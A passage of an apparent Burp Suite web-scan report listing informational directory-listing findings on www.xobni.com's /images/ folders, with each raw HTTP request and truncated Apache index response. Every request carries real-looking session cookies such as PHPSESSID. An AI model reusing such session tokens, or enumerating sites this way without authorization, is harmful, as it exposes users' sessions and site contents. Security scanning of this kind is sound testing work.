<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/partners</title>
</head>
<body>
<h1>Index of /images/partners</h1>
<table><tr><th><img src="/icons/bl
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.25. http://www.xobni.com/images/parts/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/parts/

Request

GET /images/parts/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1216
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/parts</title>
</head>
<body>
<h1>Index of /images/parts</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.26. http://www.xobni.com/images/press/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/press/

Request

GET /images/press/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5190
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/press</title>
</head>
<body>
<h1>Index of /images/press</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.27. http://www.xobni.com/images/promo/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/promo/

Request

GET /images/promo/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1196
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/promo</title>
</head>
<body>
<h1>Index of /images/promo</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.28. http://www.xobni.com/images/screenshots/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/screenshots/

Request

GET /images/screenshots/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 6492
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/screenshots</title>
</head>
<body>
<h1>Index of /images/screenshots</h1>
<table><tr><th><img src="/ic
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.29. http://www.xobni.com/images/store/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/store/

Request

GET /images/store/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1034
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/store</title>
</head>
<body>
<h1>Index of /images/store</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.30. http://www.xobni.com/images/structure/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/

Request

GET /images/structure/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3468
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure</title>
</head>
<body>
<h1>Index of /images/structure</h1>
<table><tr><th><img src="/icons/
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.31. http://www.xobni.com/images/structure/ambient1/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/ambient1/

Request

GET /images/structure/ambient1/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1814
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/ambient1</title>
</head>
<body>
<h1>Index of /images/structure/ambient1</h1>
<table><tr><th
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.32. http://www.xobni.com/images/structure/amblue/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/amblue/

Request

GET /images/structure/amblue/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/amblue</title>
</head>
<body>
<h1>Index of /images/structure/amblue</h1>
<table><tr><th><im
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.33. http://www.xobni.com/images/structure/download/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/download/

Request

GET /images/structure/download/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1034
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/download</title>
</head>
<body>
<h1>Index of /images/structure/download</h1>
<table><tr><th
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.34. http://www.xobni.com/images/structure/global/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/global/

Request

GET /images/structure/global/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:19 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 80204

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/global</title>
</head>
<body>
<h1>Index of /images/structure/global</h1>
<table><tr><th><im
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.35. http://www.xobni.com/images/structure/global/v1_8s/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/global/v1_8s/

Request

GET /images/structure/global/v1_8s/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/global/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3447
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/global/v1_8s</title>
</head>
<body>
<h1>Index of /images/structure/global/v1_8s</h1>
<table
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/global/">Parent Directory</a>
...[SNIP]...

13.36. http://www.xobni.com/images/structure/homepageapr10/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/homepageapr10/

Request

GET /images/structure/homepageapr10/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:22 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4476
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/homepageapr10</title>
</head>
<body>
<h1>Index of /images/structure/homepageapr10</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.37. http://www.xobni.com/images/structure/homepageaug10/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/homepageaug10/

Request

GET /images/structure/homepageaug10/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:22 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4546
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/homepageaug10</title>
</head>
<body>
<h1>Index of /images/structure/homepageaug10</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.38. http://www.xobni.com/images/structure/homepagejul10/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/homepagejul10/

Request

GET /images/structure/homepagejul10/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2922
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/homepagejul10</title>
</head>
<body>
<h1>Index of /images/structure/homepagejul10</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.39. http://www.xobni.com/images/structure/homepagemar10/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/homepagemar10/

Request

GET /images/structure/homepagemar10/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2646
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/homepagemar10</title>
</head>
<body>
<h1>Index of /images/structure/homepagemar10</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.40. http://www.xobni.com/images/structure/homepagenov09/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/homepagenov09/

Request

GET /images/structure/homepagenov09/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2410
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/homepagenov09</title>
</head>
<body>
<h1>Index of /images/structure/homepagenov09</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.41. http://www.xobni.com/images/structure/linkedin/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/linkedin/

Request

GET /images/structure/linkedin/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1092
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/linkedin</title>
</head>
<body>
<h1>Index of /images/structure/linkedin</h1>
<table><tr><th
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.42. http://www.xobni.com/images/structure/partners_amblue/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/partners_amblue/

Request

GET /images/structure/partners_amblue/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3458
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/partners_amblue</title>
</head>
<body>
<h1>Index of /images/structure/partners_amblue</h1>

...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.43. http://www.xobni.com/images/structure/partners_gray/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/partners_gray/

Request

GET /images/structure/partners_gray/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2042
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/partners_gray</title>
</head>
<body>
<h1>Index of /images/structure/partners_gray</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.44. http://www.xobni.com/images/structure/press/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/press/

Request

GET /images/structure/press/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 894
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/press</title>
</head>
<body>
<h1>Index of /images/structure/press</h1>
<table><tr><th><img
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.45. http://www.xobni.com/images/structure/skype/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/structure/skype/

Request

GET /images/structure/skype/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
